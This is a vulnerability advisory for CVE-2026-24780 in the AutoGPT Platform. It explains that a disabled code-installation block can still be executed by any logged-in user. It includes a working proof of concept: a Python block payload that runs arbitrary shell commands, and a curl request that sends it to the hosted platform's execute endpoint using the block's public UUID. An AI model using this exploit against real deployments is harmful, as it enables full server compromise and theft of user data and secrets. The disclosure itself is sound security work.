CVE-2026-24780

"disabled: If the block is disabled, it will not be available for execution."

The block listing endpoint correctly filters disabled blocks (if not b.disabled), but the execution endpoints do not check this flag.

The dangerous block (blocks/block.py#L15-78):

class BlockInstallationBlock(Block):
    """
    NOTE: This block allows remote code execution on the server,
    and it should be used for development purposes only.
    """

    def __init__(self):
        super().__init__(
            id="45e78db5-03e9-447f-9395-308d712f5f08",  # Hardcoded, public UUID
            disabled=True,  # NOT ENFORCED!
        )

    async def run(self, input_data: Input, **kwargs) -> BlockOutput:
        code = input_data.code

        # Writes attacker code to server filesystem
        file_path = f"{block_dir}/{file_name}.py"
        with open(file_path, "w") as f:
            f.write(code)

        # Executes via import (RCE)
        module = __import__(module_name, fromlist=[class_name])

PoC

1. Create malicious block code

PAYLOAD = '''
import os
from backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput
from backend.data.model import SchemaField

class RCEBlock(Block):
    class Input(BlockSchemaInput):
        cmd: str = SchemaField(description="Command")
    class Output(BlockSchemaOutput):
        result: str = SchemaField(description="Result")

    def __init__(self):
        super().__init__(
            id="aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
            description="RCE",
            input_schema=self.Input,
            output_schema=self.Output,
        )

    async def run(self, input_data, **kwargs):
        import subprocess
        result = subprocess.check_output(input_data.cmd, shell=True).decode()
        yield "result", result
'''

2. Execute via main web API (any logged-in user)

# Get session cookie by logging into the web UI, then:
curl -X POST "https://platform.autogpt.app/api/blocks/45e78db5-03e9-447f-9395-308d712f5f08/execute" \
  -H "Cookie: session=<your_session_cookie>" \
  -H "Content-Type: application/json" \
  -d '{"code": "<PAYLOAD>"}'

The malicious Python code is written to the server's backend/blocks/ directory and immediately executed via __import__().

Alternative route: Mint an API key with EXECUTE_BLOCK via POST /api-keys, then call the external API POST /external-api/v1/blocks/{id}/execute.

Impact

Any user who can create an account on AutoGPT Platform can achieve full Remote Code Execution on the backend server.

This allows:

• Complete server compromise
• Access to all user data, credentials, and API keys stored in the database
• Access to environment variables (cloud credentials, secrets)
• Lateral movement to connected infrastructure (Redis, PostgreSQL, cloud services)
• Persistent backdoor installation

Attack requirements:

• Create a free account on the platform (default self-hosted enables signup; hosted deployments may disable signup, requiring an existing account)
• Know the disabled block's UUID (hardcoded in public source code: 45e78db5-03e9-447f-9395-308d712f5f08)

Why the disabled flag exists but fails:

• Block listing correctly filters disabled blocks (users don't see them in UI)
• Execution endpoints bypass this check entirely
• The UUID is static and publicly known from the open-source codebase

Severity note: CVSS assumes the default self-hosted configuration where signup is enabled (low-privilege authentication is easy to obtain). If signup is disabled in a hosted deployment, likelihood is lower, but impact remains critical once any authenticated account exists.

A fix is available, but was not published to the PyPI registry at time of publication: 0.6.44